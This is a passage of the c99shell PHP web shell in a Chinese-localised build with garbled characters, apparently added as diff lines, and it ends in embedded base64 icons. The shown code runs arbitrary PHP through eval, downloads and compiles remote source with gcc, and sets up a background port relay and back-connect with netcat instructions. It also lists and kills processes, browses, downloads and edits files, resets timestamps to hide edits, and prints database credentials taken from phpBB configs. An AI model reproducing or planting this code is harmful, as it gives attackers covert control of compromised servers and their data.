    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "ä¸èƒ½å†™ä¿¡æ¯è¿› \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "无法下载资æº!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "我无法连接到 localhost:".$datapipe["localport"]."! 我想你应该é…置你的防ç«å¢™.";} + else {echo "æ•°æ®ç®¡é“è¿è¡Œä¸­... ok! 连接到 ".getenv("SERVER_ADDR").":".$datapipe["port"].", 你将连接到 ".$datapipe["remoteaddr"]."! 你应该使用 NetCat©, è¿è¡Œ \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    查看数æ®ç®¡é“进程
    ";} + } + echo "
    "; + } + } + ?> + 绑定端å£:
    + 端å£: + "> å¯†ç : + ">   + +
    + 返回连接:
    +
    + 主机: + "> ç«¯å£: + ">   +
    + åªæœ‰åœ¨æ‚¨æ‰“开端å£åŽæ‰èƒ½ç‚¹å‡»è¿žæŽ¥. 你应该使用 NetCat©ï¼ˆç®€ç§°NC), 执行命令 "nc -l -n -v -p "!

    + æ•°æ®ç®¡é“:
    +
    + 主机: + "> æœ¬åœ°ç«¯å£: + ">   +
    + 注æ„: 资æºå°†ä¼šä»Žè¿œç¨‹ä¸»æœºæœåŠ¡å™¨ä¸Šä¸‹è½½.进程:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "ä¸èƒ½æ‰§è¡Œ \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "å‘é€ä¿¡æ¯ ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "错误.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "执行此段PHP-Coad的结果:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "执行 PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     æ˜¾ç¤ºåœ¨æ–‡æœ¬åŒºåŸŸ 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    æƒé™æ‹’ç» (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    文件ä¸å­˜åœ¨ (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("代ç ","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "æµè§ˆæ–‡ä»¶:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    选择文件类型:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "ä¿¡æ¯:"; + if (!$win) + { + echo "
    路径 ".$d.$f."
    å¤§å° ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    用户/组 "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    å…许".view_perms_color($d.$f)."
    文件创建时间 ".date("d/m/Y H:i:s",filectime($d.$f))."
    上次访问时间 ".date("d/m/Y H:i:s",fileatime($d.$f))."
    最åŽä¿®æ”¹æ—¶é—´ ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP 预览"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 ç¼–ç 
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 ç¼–ç  + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 编译"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [空] [预览]
    Base64: +
    [ç¼–ç  +[+chunk +[+chunk+quotes +[è§£ç  +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "执行文件:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB 培æ¤æ–‡ä»¶æ— æ³•åœ¨æ­¤æ–‡ä»¶ä¸­æŸ¥å‡º!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "因此你ä¸èƒ½è¿žæŽ¥åˆ°è®ºå›çš„SQL SERVER, 因为 db-software=\"".$dbms."\" ä¸æ˜¯æœ‰ c99shell.æä¾›.请使用传真回å¤æˆ‘们.";} + echo "手工连接å‚é‡:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    大å°: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "无法写入此文件!";} + else + { + echo "å·²ä¿å­˜!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    手工选择的类型是ä¸æ­£ç¡®çš„.如果您认为这是一个错误å‘é€ç»™æˆ‘们连接URL并丢弃 \$GLOBALS.
    ";} + else {echo "
    未知扩展 (".$ext."), 请手工选择类型.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 